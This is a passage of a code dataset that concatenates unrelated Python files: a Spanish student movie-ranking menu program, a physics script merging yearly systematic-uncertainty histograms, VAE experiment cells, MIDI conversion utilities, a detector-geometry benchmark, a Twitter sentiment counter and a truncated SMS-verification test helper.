moviesbygenre(lst2,genre,opcion,criteria):\n \"\"\"\n Genera rankings de acuerdo a las condiciones puestas.\n\n Arg:\n lst2 :: list\n -La informacion de detallada de las peliculas.\n genre: str\n - Genero de la pelícla\n criteria :: str\n -Criterio de ordenamiento(vote_count o vote_avarage)\n opcion :: int\n -Determina si se ordena de menor a mayor o de mayor a menor\n 1,2 respectivamente\n \n Retorna :: list\n -TAD list con el catalogo pedido.\n -float: promedio de votos\n \"\"\"\n \n catalog=lt.newList(datastructure='ARRAY_LIST')\n listbygenre=sup.findmoviesGenre(genre,lst2)\n sup.sort(listbygenre, criteria, opcion)\n avgsum=0\n if opcion == '1':\n i=0\n while i < 5:\n movie=lt.getElement(listbygenere, i)\n lt.addLast(catalog, movie['title'])\n avgsum+=float(info_movies[i][criteria])\n i+=1\n elif opcion == '2':\n i=0\n while i < 10:\n movie=lt.getElement(listbygenre, i)\n lt.addLast(listbygenre, movie['title'])\n avgsum+=float(info_movies[i][criteria])\n i+=1\n avgprom= avgsum/i\n return (catalog,avgprom)\n\n\n#menus\n\ndef submenu2():\n \"\"\"\n Imprime el menu de la segunda opcion\n \"\"\"\n print('Criterios de ordenamiento:\\n')\n print('\\t-1) \\\"vote_average\\\" : ordenar por la votacion promedio.')\n print('\\t-2) \\\"vote_count\\\" : ordenar por cantidad de votos.')\n print('Elija un orden de ordenamiento:\\n')\n print('\\t-1) Top 5 peores en el criterio seleccionado.')\n print('\\t-2) Top 10 mejores en el criterio seleccionado.')\n\ndef printMenu():\n \"\"\"\n Imprime el menu de opciones\n \"\"\"\n print(\"\\nBienvenido\")\n print(\"1- Cargar Datos\")\n print(\"2- Ranking de peliculas\")\n print(\"3- Conocer un director\")\n print(\"4- Conocer un actor\")\n print(\"5- Entender un genero\")\n print(\"6- Crear ranking\")\n print(\"0- Salir\")\n\ndef main():\n \"\"\"\n Método principal del programa, se encarga de manejar todos los metodos adicionales creados\n\n Instancia una lista vacia en la cual se guardarán los datos cargados desde el archivo\n Args: None\n Return: None \n \"\"\"\n lista_1=[]\n lista_2=[]\n best_10=[]\n worst_5=[]\n while True:\n printMenu() #imprimir el menu de opciones en consola\n inputs =input('Seleccione una opción para continuar\\n') #leer opción ingresada\n if len(inputs)>0:\n if int(inputs[0])==1: #opcion 1\n print('1- Carga la informacion del casting de las peliculas\\n')\n print('2- Carga la informacion detallada de las peliculas\\n')\n opcion=input('Selecione la lista de datos que desea cargar\\n')\n if opcion == '1':\n lista_1=loadMovies('Data\\moviesdb\\MoviesCastingRaw-small.csv', lista_1)\n elif opcion == '2':\n lista_2=loadMovies('Data\\moviesdb\\SmallMoviesDetailsCleaned.csv', lista_2)\n else:\n print('Esa opcion no es valida')\n elif int(inputs[0])==2: #opcion 2\n submenu2()\n criteria=input('Escoja un criterio de ordenamiento:\\n')\n opcion=input('Escoja un orden:\\n')\n if criteria == '1':\n if opcion == '1':\n worst_5=rankingMovies(lista_2, criteria, opcion)\n cadena=','.join(worst_5)\n print('Las peores 5 peliculas segun su votacion promedio son: ', cadena)\n i=0\n while i < lt.size(worst_5):\n print(lt.getElement(worst_5,i))\n i+=1 \n elif opcion == '2':\n best_10=rankingMovies(lista_2, criteria, opcion)\n cadena=','.join(best_10)\n print('Las mejores 10 peliculas segun su votacion promedio son: ', cadena)\n i=0\n while i < lt.size(best_10):\n print(lt.getElement(best_10,i))\n i+=1\n else:\n print('La opcion: \\\"', opcion,'\\\" no es una opcion valida')\n elif criteria == '2':\n if opcion == '1':\n worst_5=rankingMovies(lista_2, criteria, opcion)\n cadena=','.join(worst_5)\n print('Las peores 5 peliculas segun su cantidad de votos son: ')\n i=0\n while i < lt.size(worst_5):\n print(lt.getElement(worst_5,i))\n i+=1 \n elif opcion == '2':\n best_10=rankingMovies(lista_2, criteria, opcion)\n print('Las mejores 10 peliculas segun su cantidad de votos }son: ')\n i=0\n while i < lt.size(best_10):\n print(lt.getElement(best_10,i))\n i+=1\n else:\n print('La opcion: \\\"', opcion,'\\\" no es una opcion valida')\n else:\n print(criteria, 'No es una opcion valida.')\n elif int(inputs[0])==3: #opcion 3\n director_name=input('Digite el nombre del director:\\n')\n (movies_director, size, avg)=SearchbyDirector(lista_1, lista_2, director_name)\n print('La cantidad de peliculas del director son: ', str(size), 'y tiene una votacion promedio de: ', str(avg),'.')\n print('Las peliculas en las que participo fueron:\\n')\n cadena=','.join(movies_director)\n print(cadena)\n elif int(inputs[0])==4: #opcion 4\n actor_name=input('Digite el nombre del actor:\\n')\n (movies_actor, size, avg, director)=SearchbyActor(lista_1, lista_2, actor_name) \n print('La cantidad de peliculas en las que participo el actor son: ', str(size), 'y tiene una votacion promedio de: ', str(avg),'.')\n print('El director con el que más trabajo fue: ', director)\n print('Las peliculas en la que participo fueron:\\n')\n cadena=','.join(movies_actor)\n print(cadena)\n elif int(inputs[0])==5: #opcion 5\n genre=input('Digite un genero para buscar:\\n')\n (movies_genre, size, avg)=meetGenre(lista_1, lista_2, genre)\n print('La cantidad de peliculas encontradad para el genero: \\\"', genre,'\\\" son: ', str(size), 'y tiene una votacion promedio de: ', str(avg),'.')\n print('Los titulos son:\\n')\n cadena=','.join(movies_genre)\n print(cadena)\n\n elif int(inputs[0])==6: #opcion 6\n genre= input(\"Escoja un género:\\n\")\n criteria=input('Escoja un criterio de ordenamiento:\\n')\n opcion=input('Escoja un orden:\\n')\n if criteria == '1':\n if opcion == '1':\n worst_5_va=moviesbygenre(lst2, genre, opcion, criteria)\n print('Las peores 5 peliculas segun su votacion promedio son: ')\n print(\"el promedio de votación es: \"+ str(worst_5_va[1]))\n i=0\n while i < lt.size(worst_5_va[0]):\n print(lt.getElement(worst_5_va[0],i))\n i+=1 \n elif opcion == '2':\n best_10_va=moviesbygenre(lst2, genre, opcion, criteria)\n print('Las mejores 10 peliculas segun su votacion promedio son: ')\n print(\"el promedio de votación es: \"+ str(best_10_va[1]))\n i=0\n while i < lt.size(best_10_va[1]):\n print(lt.getElement(best_10_va[1],i))\n i+=1\n else:\n print('La opcion: \\\"', opcion,'\\\" no es una opcion valida')\n elif criteria == '2':\n if opcion == '1':\n worst_5_vc=moviesbygenre(lst2, genre, opcion, criteria)\n print('Las peores 5 peliculas segun su cantidad de votos son: ')\n print(\"el promedio de votación es: \"+ str(worst_5_vc[1]))\n i=0\n while i < lt.size(worst_5_vc[0]):\n print(lt.getElement(worst_5_vc[0],i))\n i+=1 \n elif opcion == '2':\n best_10_vc=moviesbygenre(lst2, genre, opcion, criteria)\n print('Las mejores 10 peliculas segun su cantidad de votos son: ')\n print(\"el promedio de votación es: \"+ str(best_10_vc[1]))\n i=0\n while i < lt.size(best_10_vc[0]):\n print(lt.getElement(best_10_vc[0],i))\n i+=1\n else:\n print('La opcion: \\\"', opcion,'\\\" no es una opcion valida')\n\n\n elif int(inputs[0])==0: #opcion 0, salir\n sys.exit(0)\n \nif __name__ == \"__main__\":\n main()","sub_path":"App/reto.py","file_name":"reto.py","file_ext":"py","file_size_in_byte":15789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"57716661","text":"#! /usr/bin/env python\n\n\n#\n# Argument parser and logging\n#\nimport os, argparse\nargParser = argparse.ArgumentParser(description = \"Argument parser\")\nargParser.add_argument('--logLevel', action='store', default='INFO', help='Log level for logging', nargs='?', choices=['CRITICAL', 'ERROR', 'WARNING', 'INFO', 'DEBUG', 'TRACE'])\n# argParser.add_argument('--tag', action='store', default='unfTest2', help='Specify type of reducedTuple')\nargs = argParser.parse_args()\n\nimport ROOT\nimport pdb\nimport glob\n\nROOT.gROOT.SetBatch(True)\n\nfrom ttg.tools.helpers import plotDir, getObjFromFile, lumiScales, lumiScalesRounded\nimport copy\nimport pickle\nimport numpy\nfrom ttg.plots.systematics import showSysListRunII\n\nfrom ttg.tools.logger import getLogger\nlog = getLogger(args.logLevel)\n\n\ndef getRMS(histDict):\n# WARNING this modifies the systematics histograms, be aware if you look at them later in the code\n nominal = histDict[''].Clone()\n rms = nominal.Clone()\n rms.Reset('ICES')\n\n for var in histDict.keys():\n if var == '': continue\n histDict[var].Add(nominal, -1.)\n histDict[var].Multiply(histDict[var])\n rms.Add(histDict[var])\n\n nvars = len(histDict)-1\n\n for i in range(0, rms.GetXaxis().GetNbins()+1):\n rms.SetBinContent(i, (rms.GetBinContent(i)/nvars)**0.5)\n return rms\n\ndef getEnv(histDict):\n# WARNING this modifies the systematics histograms, be aware if you look at them later in the code\n nominal = histDict[''].Clone()\n maxUp = nominal.Clone()\n maxUp.Reset('ICES')\n maxDown = maxUp.Clone()\n\n for var in histDict.keys(): \n histDict[var].Add(nominal, -1.)\n\n for i in range(0, nominal.GetNbinsX()+1):\n maxUp.SetBinContent( i, max([hist.GetBinContent(i) for hist in histDict.values()]))\n maxDown.SetBinContent(i, min([hist.GetBinContent(i) for hist in histDict.values()]))\n\n return maxUp, maxDown\n\nlumiUnc = {\n'lumi_1718' : {'16': 0. , '17': 0.006 , '18': 0.002 },\n'lumi_2016' : {'16': 0.009 , '17': 0. , '18': 0. },\n'lumi_2017' : {'16': 0. , '17': 0.02 , '18': 0. },\n'lumi_2018' : {'16': 0. , '17': 0. , '18': 0.015 },\n'lumi_3Ycorr': {'16': 0.006 , '17': 0.009 , '18': 0.02 }\n}\n\ndef invertVar(nomHist, varHist):\n inverseHist = nomHist.Clone()\n for i in range(1, nomHist.GetNbinsX()+1):\n inverseHist.SetBinContent(i, max(2. * nomHist.GetBinContent(i) - varHist.GetBinContent(i), 0.))\n return inverseHist\n\n# distList = [\n# 'unfReco_phLepDeltaR',\n# # 'unfReco_jetLepDeltaR',\n# # 'unfReco_jetPt',\n# # 'unfReco_ll_absDeltaEta',\n# # 'unfReco_ll_deltaPhi',\n# # 'unfReco_phAbsEta',\n# # 'unfReco_phBJetDeltaR',\n# # 'unfReco_phPt',\n# # 'unfReco_phLep1DeltaR',\n# # 'unfReco_phLep2DeltaR',\n# # 'unfReco_Z_pt',\n# # 'unfReco_l1l2_ptsum'\n# ]\n\n\n# noYearCor = ['lSFElStat' ,'lSFMuStat' ,'pvSF' ,'trigStatEE','trigStatEM','trigStatMM','trigSyst' ,'HFUC' ,'AbsoluteUC' ,'BBEC1UC' ,'EC2UC' ,'RelativeSampleUC', 'bTagbUC']\n\nnoYearCor = [i.split('_2016')[0] for i in showSysListRunII if i.count('_2016')]\n#################### main code ####################\n\n\n\nfor channel in ['ee', 'emu', 'mumu', 'all']:\n \n distList = glob.glob('/storage_mnt/storage/user/gmestdac/public_html/ttG/2016/phoCBfull-niceEstimDD-RE/' + channel + '/llg-mll20-deepbtag1p-offZ-llgNoZ-photonPt20/*.pkl')\n distList = [i.split('/')[-1].split('.pkl')[0] for i in distList]\n\n if not os.path.exists('/storage_mnt/storage/user/gmestdac/public_html/ttG/all/phoCBfull-niceEstimDD-RE-merged/' + channel + '/llg-mll20-deepbtag1p-offZ-llgNoZ-photonPt20/'):\n os.makedirs('/storage_mnt/storage/user/gmestdac/public_html/ttG/all/phoCBfull-niceEstimDD-RE-merged/' + channel + '/llg-mll20-deepbtag1p-offZ-llgNoZ-photonPt20/')\n\n for dist in distList:\n log.info('running for plot '+ dist + ' in the channel ' + channel)\n try:\n reco16 = pickle.load(open('/storage_mnt/storage/user/gmestdac/public_html/ttG/2016/phoCBfull-niceEstimDD-RE/'+ channel +'/llg-mll20-deepbtag1p-offZ-llgNoZ-photonPt20/' + dist + '.pkl','r'))\n reco17 = pickle.load(open('/storage_mnt/storage/user/gmestdac/public_html/ttG/2017/phoCBfull-niceEstimDD-RE/'+ channel +'/llg-mll20-deepbtag1p-offZ-llgNoZ-photonPt20/' + dist + '.pkl','r'))\n reco18 = pickle.load(open('/storage_mnt/storage/user/gmestdac/public_html/ttG/2018/phoCBfull-niceEstimDD-RE/'+ channel +'/llg-mll20-deepbtag1p-offZ-llgNoZ-photonPt20/' + dist + '.pkl','r'))\n\n recoRunII = copy.deepcopy(reco16)\n\n for var in recoRunII.keys():\n direc = '' # if nominal this just stays\n if var.count('Up'):\n var = var.split('Up')[0]\n direc = 'Up'\n elif var.count('Down'):\n var = var.split('Down')[0]\n direc = 'Down'\n\n\n if any(var.count(uncorVar) for uncorVar in noYearCor):\n recoRunII[var + '_2016' + direc] = {}\n recoRunII[var + '_2017' + direc] = {}\n recoRunII[var + '_2018' + direc] = {}\n for proc in recoRunII[var + direc].keys():\n # recoRunII[var + direc][proc] = None\n recoRunII[var + '_2016' + direc][proc] = reco16[var + direc][proc].Clone()\n recoRunII[var + '_2016' + direc][proc].Add(reco17[dist][proc])\n recoRunII[var + '_2016' + direc][proc].Add(reco18[dist][proc])\n\n recoRunII[var + '_2017' + direc][proc] = reco16[dist][proc].Clone()\n recoRunII[var + '_2017' + direc][proc].Add(reco17[var + direc][proc])\n recoRunII[var + '_2017' + direc][proc].Add(reco18[dist][proc])\n\n recoRunII[var + '_2018' + direc][proc] = reco16[dist][proc].Clone()\n recoRunII[var + '_2018' + direc][proc].Add(reco17[dist][proc])\n recoRunII[var + '_2018' + direc][proc].Add(reco18[var + direc][proc])\n del recoRunII[var + direc]\n\n else:\n for proc in recoRunII[var+direc].keys():\n recoRunII[var + direc][proc].Add(reco17[var + direc][proc])\n recoRunII[var + direc][proc].Add(reco18[var + direc][proc])\n\n recoRunII[dist + 'fdpUp'] = {}\n recoRunII[dist + 'fdpDown'] = {}\n recoRunII[dist + '2qUp'] = {}\n recoRunII[dist + '2qDown'] = {}\n\n recoRunII[dist + 'colRec_1Up'] = {}\n recoRunII[dist + 'colRec_1Down'] = {} \n recoRunII[dist + 'colRec_2Up'] = {}\n recoRunII[dist + 'colRec_2Down'] = {}\n recoRunII[dist + 'colRec_3Up'] = {}\n recoRunII[dist + 'colRec_3Down'] = {}\n \n for proc in recoRunII[dist].keys():\n q2dict16 = dict((var, reco16[dist + var][proc].Clone()) for var in ['']+['q2_' + i for i in ('Ru', 'Fu', 'RFu', 'Rd', 'Fd', 'RFd')])\n pdfdict16 = dict((var, reco16[dist + var][proc].Clone()) for var in ['']+['pdf_' + str(i) for i in range(0, 100)])\n q2dict17 = dict((var, reco17[dist + var][proc].Clone()) for var in ['']+['q2_' + i for i in ('Ru', 'Fu', 'RFu', 'Rd', 'Fd', 'RFd')])\n pdfdict17 = dict((var, reco17[dist + var][proc].Clone()) for var in ['']+['pdf_' + str(i) for i in range(0, 100)])\n q2dict18 = dict((var, reco18[dist + var][proc].Clone()) for var in ['']+['q2_' + i for i in ('Ru', 'Fu', 'RFu', 'Rd', 'Fd', 'RFd')])\n pdfdict18 = dict((var, reco18[dist + var][proc].Clone()) for var in ['']+['pdf_' + str(i) for i in range(0, 100)])\n\n \n plq2Up16, plq2Down16 = getEnv(q2dict16)\n rmspdf16 = getRMS(pdfdict16)\n\n plq2Up17, plq2Down17 = getEnv(q2dict17)\n rmspdf17 = getRMS(pdfdict17)\n\n plq2Up18, plq2Down18 = getEnv(q2dict18)\n rmspdf18 = getRMS(pdfdict18)\n\n recoRunII[dist + 'fdpUp'][proc] = recoRunII[dist][proc].Clone()\n recoRunII[dist + 'fdpDown'][proc] = recoRunII[dist][proc].Clone()\n recoRunII[dist + '2qUp'][proc] = recoRunII[dist][proc].Clone()\n recoRunII[dist + '2qDown'][proc] = recoRunII[dist][proc].Clone()\n\n recoRunII[dist + '2qUp'][proc].Add(plq2Up16)\n recoRunII[dist + '2qDown'][proc].Add(plq2Down16)\n recoRunII[dist + 'fdpUp'][proc].Add(rmspdf16)\n recoRunII[dist + 'fdpDown'][proc].Add(rmspdf16, -1)\n\n recoRunII[dist + '2qUp'][proc].Add(plq2Up17)\n recoRunII[dist + '2qDown'][proc].Add(plq2Down17)\n recoRunII[dist + 'fdpUp'][proc].Add(rmspdf17)\n recoRunII[dist + 'fdpDown'][proc].Add(rmspdf17, -1)\n\n recoRunII[dist + '2qUp'][proc].Add(plq2Up18)\n recoRunII[dist + '2qDown'][proc].Add(plq2Down18)\n recoRunII[dist + 'fdpUp'][proc].Add(rmspdf18)\n recoRunII[dist + 'fdpDown'][proc].Add(rmspdf18, -1)\n\n\n colrec_1_RII = reco16[dist + 'colRec_1'][proc].Clone()\n colrec_1_RII.Add(reco17[dist + 'colRec_1'][proc])\n colrec_1_RII.Add(reco18[dist + 'colRec_1'][proc])\n\n recoRunII[dist + 'colRec_1Up'][proc] = colrec_1_RII.Clone()\n recoRunII[dist + 'colRec_1Down'][proc] = invertVar(recoRunII[dist][proc], colrec_1_RII).Clone()\n\n colrec_2_RII = reco16[dist + 'colRec_2'][proc].Clone()\n colrec_2_RII.Add(reco17[dist + 'colRec_2'][proc])\n colrec_2_RII.Add(reco18[dist + 'colRec_2'][proc])\n\n recoRunII[dist + 'colRec_2Up'][proc] = colrec_2_RII.Clone()\n recoRunII[dist + 'colRec_2Down'][proc] = invertVar(recoRunII[dist][proc], colrec_2_RII).Clone()\n\n colrec_3_RII = reco16[dist + 'colRec_3'][proc].Clone()\n colrec_3_RII.Add(reco17[dist + 'colRec_3'][proc])\n colrec_3_RII.Add(reco18[dist + 'colRec_3'][proc])\n\n recoRunII[dist + 'colRec_3Up'][proc] = colrec_3_RII.Clone()\n recoRunII[dist + 'colRec_3Down'][proc] = invertVar(recoRunII[dist][proc], colrec_3_RII).Clone()\n\n del recoRunII[dist + 'colRec_1']\n del recoRunII[dist + 'colRec_2']\n del recoRunII[dist + 'colRec_3']\n for var in ['q2_' + i for i in ('Ru', 'Fu', 'RFu', 'Rd', 'Fd', 'RFd')]:\n del recoRunII[dist + var]\n for var in ['pdf_' + str(i) for i in range(0, 100)]:\n del recoRunII[dist + var]\n\n\n\n for fac, direc in [(-1., 'Down'), (1., 'Up')]:\n recoRunII[dist + 'lumi_1718' + direc] = {}\n recoRunII[dist + 'lumi_2016' + direc] = {}\n recoRunII[dist + 'lumi_2017' + direc] = {}\n recoRunII[dist + 'lumi_2018' + direc] = {}\n recoRunII[dist + 'lumi_3Ycorr' + direc] = {}\n\n for proc in recoRunII[dist].keys():\n if proc.count('data'): continue\n factor = fac\n if proc.count('nonprompt'): factor = 0. #maybe change to \"estimate\", see if that checks out though\n\n for lumunc in ['lumi_1718' , 'lumi_2016' , 'lumi_2017' , 'lumi_2018' , 'lumi_3Ycorr']:\n l16 = reco16[dist][proc].Clone()\n l17 = reco17[dist][proc].Clone()\n l18 = reco18[dist][proc].Clone()\n\n l16.Scale(1. + factor * lumiUnc[lumunc]['16'])\n l17.Scale(1. + factor * lumiUnc[lumunc]['17'])\n l18.Scale(1. + factor * lumiUnc[lumunc]['18'])\n\n # l16.Scale( (1. + lumiUnc[lumunc]['16'])**factor )\n # l17.Scale( (1. + lumiUnc[lumunc]['17'])**factor )\n # l18.Scale( (1. + lumiUnc[lumunc]['18'])**factor )\n\n l16.Add(l17)\n l16.Add(l18)\n recoRunII[dist + lumunc + direc][proc] = l16.Clone()\n\n # data skippen\n # nonprompt niet scalen maar wel writen\n\n\n\n\n\n # lumi_1718 lnN - 1.006 1.002 \n # lumi_2016 lnN 1.009 - - \n # lumi_2017 lnN - 1.02 - \n # lumi_2018 lnN - - 1.015 \n # lumi_3Ycorr lnN 1.006 1.009 1.02 \n\n pickle.dump(recoRunII, file('/storage_mnt/storage/user/gmestdac/public_html/ttG/all/phoCBfull-niceEstimDD-RE-merged/' + channel + '/llg-mll20-deepbtag1p-offZ-llgNoZ-photonPt20/' + dist + '.pkl', 'w'))\n except Exception as e:\n log.info(e)\n log.info('failed for distribution '+ dist)","sub_path":"plots/yearMerger.py","file_name":"yearMerger.py","file_ext":"py","file_size_in_byte":11884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"145370791","text":"# %%\nimport runner as runner\nrunner_instance = runner.Runner(dataset_key=runner.Dataset.CALTECH, architecture=runner.Architecture.HVAE, prior_configuration=runner.PriorConfiguration.VAMPGEN, n_epochs=2,root=\"../exports\")\nrunner_instance.run()\n# %%\nimport runner as runner\nrunner_instance = runner.Runner(dataset_key=runner.Dataset.CALTECH, architecture=runner.Architecture.VANILLA, prior_configuration=runner.PriorConfiguration.SG, n_epochs=2,root=\"../exports\")\nrunner_instance.reload_existing_model()\n\n# %%\nimport matplotlib.pyplot as plt\nmodel = runner_instance.model\nprior = model.get_prior()\nencoder = model.get_encoder()\ndecoder = model.get_decoder()\ngenerated_img = decoder(prior.sample(1)).mean()\n\nplt.imshow(generated_img[0])\n\n# %%\nimport sys\nsys.path.append('../')\nimport utils.datasets as data\ncalt = data.get_dataset(data.DatasetKey.CALTECH)\ncalt['X'].shape\nnp.reshape(calt['X'], (-1, 28, 28)).shape\n# %%\nimport numpy as np\ncalt['X'].shape\nplt.imshow(calt['X'][np.random.randint(5000)].reshape(28,28), cmap = \"Greys\")\n# %%\nnp.random.randint(52000\n)\n# %%\nplt.imshow(runner_instance.x_train[4])","sub_path":"experiments/test_runner.py","file_name":"test_runner.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"18291405","text":"import json\nfrom mido import MidiFile, MidiTrack, MetaMessage, Message\n\ndef dumpMidi(midi, prefix, charset='utf-8'):\n midi = MidiFile(midi, charset=charset)\n tempo = 500000\n bar = 4\n\n for idx, t in enumerate(midi.tracks):\n outs = dict()\n keys = dict()\n now = 0.0\n for m in t:\n now += m.time\n if m.type == 'set_tempo':\n tempo = m.tempo\n elif m.type == 'time_signature':\n bar = m.numerator\n if m.type != 'note_on' and m.type != 'note_off':\n continue\n ch = m.channel\n if not ch in outs:\n outs[ch] = list()\n keys[ch] = dict()\n if m.type == 'note_off' or m.velocity == 0:\n if m.note in keys[ch]:\n st = keys[ch][m.note]\n if now - st > 0.01 * midi.ticks_per_beat:\n note = { \"offset\": st / midi.ticks_per_beat, \"note\": m.note, \"length\": (now - st) / midi.ticks_per_beat }\n outs[ch].append(note)\n keys[ch].pop(m.note)\n else:\n if m.note in keys[ch]:\n st = keys[ch][m.note]\n note = { \"offset\": st / midi.ticks_per_beat, \"note\": m.note, \"length\": (now - st) / midi.ticks_per_beat }\n outs[ch].append(note)\n keys[ch][m.note] = now\n for ch, v in outs.items():\n path = prefix + '-' + str(idx) + '-' + str(ch) + '.json'\n with open(path, 'w') as f:\n json.dump({\n 'bpm': 60000000.0 / tempo,\n 'bar': bar, 'notes': v\n }, f, indent=2)\n\ndef writeMidi(track):\n mid = MidiFile()\n midiTrack = MidiTrack()\n mid.tracks.append(midiTrack)\n tpb = mid.ticks_per_beat\n\n midiTrack.append(MetaMessage('set_tempo', tempo=round(60000000.0 / track['bpm'])))\n midiTrack.append(MetaMessage('time_signature', numerator=track['bar']))\n events = [ ('note_on', n['note'], n['offset']) for n in track['notes'] ]\n events.extend( ('note_off', n['note'], n['offset'] + n['length']) for n in track['notes'] )\n events.sort(key=lambda x: x[2])\n now = 0\n\n for e in events:\n time = round((e[2] - now) * tpb)\n midiTrack.append(Message(e[0], note=int(e[1]), velocity=127, time=time))\n now = e[2]\n\n return mid\n\ndef loadTrack(path):\n with open(path, 'r') as f:\n ret = json.load(f)\n return ret\n","sub_path":"pymad/midi.py","file_name":"midi.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"654053061","text":"\"\"\"\nDistributed under the terms of the BSD 3-Clause License.\n\nThe full license is in the file LICENSE, distributed with this software.\n\nAuthor: Jun Zhu \nCopyright (C) European X-Ray Free-Electron Laser Facility GmbH.\nAll rights reserved.\n\"\"\"\nimport os.path as osp\nimport time\n\nimport numpy as np\n\n\n_data_sources = [(np.uint16, 'raw'), (np.float32, 'calibrated')]\n\n_geom_path = osp.join(osp.dirname(osp.abspath(__file__)), \"../extra_foam/geometries\")\n\n\ndef _benchmark_1m_imp(geom_fast_cls, geom_cls, geom_file, quad_positions=None):\n\n for from_dtype, from_str in _data_sources:\n n_pulses = 64\n modules = np.ones((n_pulses,\n geom_fast_cls.n_modules,\n geom_fast_cls.module_shape[0],\n geom_fast_cls.module_shape[1]), dtype=from_dtype)\n\n # stack only\n\n geom = geom_fast_cls()\n out = np.full((n_pulses, *geom.assembledShape()), np.nan, dtype=np.float32)\n t0 = time.perf_counter()\n geom.position_all_modules(modules, out)\n dt_foam_stack = time.perf_counter() - t0\n\n # assemble with geometry and quad position\n\n if quad_positions is not None:\n geom = geom_fast_cls.from_h5_file_and_quad_positions(geom_file, quad_positions)\n else:\n geom = geom_fast_cls.from_crystfel_geom(geom_file)\n out = np.full((n_pulses, *geom.assembledShape()), np.nan, dtype=np.float32)\n t0 = time.perf_counter()\n geom.position_all_modules(modules, out)\n dt_foam = time.perf_counter() - t0\n\n # assemble with geometry and quad position in EXtra-geom\n\n if quad_positions is not None:\n geom = geom_cls.from_h5_file_and_quad_positions(geom_file, quad_positions)\n else:\n geom = geom_cls.from_crystfel_geom(geom_file)\n out = geom.output_array_for_position_fast((n_pulses,))\n t0 = time.perf_counter()\n geom.position_all_modules(modules, out=out)\n dt_geom = time.perf_counter() - t0\n\n print(f\"\\nposition all modules for {geom_cls.__name__} (from {from_str} data) - \\n\"\n f\" dt (foam stack only): {dt_foam_stack:.4f}, dt (foam): {dt_foam:.4f}, \"\n f\"dt (geom): {dt_geom:.4f}\")\n\n\ndef benchmark_dssc_1m():\n from extra_foam.geometries import DSSC_1MGeometryFast\n from extra_foam.geometries import DSSC_1MGeometry\n\n geom_file = osp.join(_geom_path, \"dssc_geo_june19.h5\")\n quad_positions = [\n [-124.100, 3.112],\n [-133.068, -110.604],\n [ 0.988, -125.236],\n [ 4.528, -4.912]\n ]\n\n _benchmark_1m_imp(DSSC_1MGeometryFast, DSSC_1MGeometry, geom_file, quad_positions)\n\n\ndef benchmark_lpd_1m():\n from extra_foam.geometries import LPD_1MGeometryFast\n from extra_foam.geometries import LPD_1MGeometry\n\n geom_file = osp.join(_geom_path, \"lpd_mar_18_axesfixed.h5\")\n quad_positions = [\n [ 11.4, 299],\n [-11.5, 8],\n [254.5, -16],\n [278.5, 275]\n ]\n\n _benchmark_1m_imp(LPD_1MGeometryFast, LPD_1MGeometry, geom_file, quad_positions)\n\n\ndef benchmark_agipd_1m():\n from extra_foam.geometries import AGIPD_1MGeometryFast\n from extra_foam.geometries import AGIPD_1MGeometry\n\n geom_file = osp.join(_geom_path, \"agipd_mar18_v11.geom\")\n\n _benchmark_1m_imp(AGIPD_1MGeometryFast, AGIPD_1MGeometry, geom_file)\n\n\nif __name__ == \"__main__\":\n print(\"*\" * 80)\n print(\"Benchmark geometry\")\n print(\"*\" * 80)\n\n benchmark_dssc_1m()\n\n benchmark_lpd_1m()\n\n benchmark_agipd_1m()\n","sub_path":"benchmarks/benchmark_geometry.py","file_name":"benchmark_geometry.py","file_ext":"py","file_size_in_byte":3553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"570797055","text":"from textblob import TextBlob\r\nimport tweepy\r\nimport sys\r\n\r\nmykeys = open(\"TwitterAPI/API_KEYS/twitterkeys.txt\", \"r\").read().splitlines()\r\n\r\napi_key = mykeys[0]\r\napi_key_secret = mykeys[1]\r\naccess_token = mykeys[2]\r\naccess_token_secret = mykeys[3]\r\n\r\nauth_handler = tweepy.OAuthHandler(consumer_key=api_key, consumer_secret=api_key_secret)\r\nauth_handler.set_access_token(access_token, access_token_secret)\r\n\r\napi = tweepy.API(auth_handler)\r\n\r\nsearch_term = \"shit\"\r\ntweet_amount = 300\r\n\r\ntweets = tweepy.Cursor(api.search, q=search_term, lang=\"en\").items(tweet_amount)\r\n\r\n\r\npositive = 0\r\nneutral = 0\r\nnegative = 0\r\n\r\npolarity = 0\r\n\r\nfor tweet in tweets:\r\n final_text = tweet.text.replace(\"RT\", \"\")\r\n if final_text.startswith(\" @\"):\r\n position = final_text.index(\":\")\r\n final_text = final_text[position+2:]\r\n if final_text.startswith(\"@\"):\r\n position = final_text.index(\" \")\r\n final_text = final_text[position+2:]\r\n\r\n analysis = TextBlob(final_text)\r\n tweet_polarity = analysis.polarity\r\n if tweet_polarity > 0:\r\n positive += 1\r\n elif tweet_polarity < 0:\r\n negative += 1\r\n else:\r\n neutral += 1\r\n polarity += tweet_polarity\r\n\r\n polarity += analysis.polarity\r\n print(final_text)\r\n\r\n\r\nprint(polarity)\r\nprint(f\"Amount of postitive tweets: {positive}\")\r\nprint(f\"Amount of neutral tweets: {neutral}\")\r\nprint(f\"Amount of negative tweets: {negative}\")","sub_path":"Python/polarity_checker.py","file_name":"polarity_checker.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"196250247","text":"from utils.baseUtils import *\nfrom utils.baseHttp import ConfigHttp\nreq = ConfigHttp()\n\"\"\"\n获取发送验证码的方法\n@:param action是注册或登录 \n@:param ftype是手机号或邮箱类型\n@:param account是手机号或邮箱\n@:param countrycode是手机号国家编码\n\"\"\"\ndef getSendverify(logger,action ,ftype, account, countrycode):\n logger.info(\"==========获取发送验证码 START=======\")\n req.httpname = \"KPTEST\"\n url = \"/account/sendverify?no_check=1\"\n data = {\n \"type\": ftype,\n \"action\": action,\n \"account\": account,\n \"country_code\": countrycode,\n \"version\": \"3.11.2\",\n \"system\": \"3\",\n \"device_model\": \"HUAWEI P10\",\n \"v\": \"3.11.2\",\n \"channel\": \"5\"\n }\n req.set_data(data)\n req.set_url(url)\n response = req.post()\n\n try:\n retcode = response[\"code\"]\n if retcode==0:\n logger.info(\"发送短信成功\")\n elif retcode==10019:\n logger.info(\"注册账号已经存在\")\n else:\n 